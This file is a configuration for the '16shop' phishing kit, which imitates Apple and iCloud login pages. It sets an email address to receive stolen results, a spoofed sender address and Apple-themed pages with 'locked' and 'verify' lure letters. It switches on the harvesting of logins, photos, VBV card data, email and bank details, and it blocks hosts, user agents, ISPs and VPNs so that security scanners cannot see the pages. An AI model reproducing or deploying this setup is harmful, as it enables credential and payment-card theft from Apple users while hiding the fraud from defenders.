[ YOUR EMAIL ]
email_result= "bsu0979@gmail.com"
[ LOCK PLATFORM = "iPhone" "iPad" "iPod" "Mac OS X" "Mac OS 9" ]
lock_platform= ""
[ SENDER MAIL ]
sender_mail= "admin@izanami.apps"
[ www.yourhost.com/?16shop ]
site_param_on= "on"
site_parameter= "loginorder_"
[ OTHER SETTING ]
site_password= "kontolshop"
site_pass_on= ""
send_login= "on"
mix_result= "on"
get_photo= "on"
get_vbv= "on"
get_email= "on"
get_bank= "on"
double_cc= "on"

[ BLOCKER AND ENC SETTING ]
onetime= ""
encrypt_html= "on"
block_host= "on"
block_ua= "on"
block_iprange= "on"
block_isp= "on"
block_vpn= "on"

[ THEME OPTION ]

[ http://16shop.online/admin/assets/images/theme_classic.png ][ clasic ]
[ http://16shop.online/admin/assets/images/theme_icloud.png ][ icloud ]
[ http://16shop.online/admin/assets/images/theme_apple.png ][ apple ]

theme= "clasic"

[ LETTER OPTION ] [ locked ] [ verify ] [ invoice ]
letter= "locked"
mix_email= ""